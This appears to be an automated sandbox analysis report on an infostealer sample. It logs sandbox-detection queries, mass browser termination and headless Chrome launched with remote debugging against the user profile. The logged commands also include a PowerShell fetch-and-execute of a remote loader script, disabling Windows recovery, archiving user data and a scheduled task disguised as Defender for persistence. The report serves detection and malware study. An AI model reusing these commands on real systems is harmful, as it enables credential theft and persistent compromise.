Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, FileSystem, FreeSpace, Size, VolumeName FROM Win32_LogicalDisk WHERE DriveType = 3
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeMemory allocated: 1E705760000 memory reserve | memory write watch
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeMemory allocated: 1E705760000 memory reserve | memory write watch
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3576Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6251Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1055
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeWindow / User API: threadDelayed 3952
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeWindow / User API: threadDelayed 5660
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8322
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6148Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\svchost.exe TID: 5540Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1276Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe TID: 3808Thread sleep time: -24903104499507879s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4568Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6208Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\ReAgentc.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer, Product, SerialNumber FROM Win32_BaseBoard WHERE Status = &apos;OK&apos;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: ReAgentc.exe, 00000005.00000003.2299005869.000002692AF25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume1\??\Volume{ad6cc5d8-f1a9-4873-be33-91b2f05e9306}\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:Z
Source: svchost.exe, 00000018.00000002.3273068653.000002809DA56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000018.00000002.3270552952.000002809822B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: SplpM1fFkV.exe, 00000000.00000002.2727559398.00000137AC6FC000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000016.00000002.2343335495.000001E7CD59C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\taskkill.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exeMemory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

barindex
Excessive usage of taskkill to terminate processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr 'https://github.com/EvilBytecode/Sryxen/releases/download/v1.0.0/sryxen_loader.ps1' | iex"Jump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command $env:USERNAMEJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Compress-Archive -Path \"C:\Users\user\AppData\Local\Temp\user\" -DestinationPath \"C:\Users\user\AppData\Local\Temp\user.zip\" -Force"Jump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get captionJump to behavior
Source: C:\Users\user\Desktop\SplpM1fFkV.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic NIC get MACAddressJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ReAgentc.exe reagentc.exe /disableJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "Microsoft Defender Threat Intelligence Handler" /sc ONLOGON /tr C:\Users\user\AppData\Roaming\DisplayDriverUpdater.exe /rl HIGHESTJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM chrome.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM firefox.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM brave.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM opera.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM kometa.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM orbitum.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM centbrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM 7star.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM sputnik.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM vivaldi.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM epicprivacybrowser.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM msedge.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM uran.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM yandex.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM iridium.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Zephyr\wallets VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Acrobat\Preflight Acrobat Continuous VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\CRLogs\crashlogs VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\AutoLaunchProtocolsComponent\1.0.0.8 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Autofill\4.0.0.8 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\BrowserMetrics VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\CertificateRevocation\6498.2023.8.1 VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Roaming\Adobe\Flash Player\NativeCache VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db VolumeInformationJump to behavior
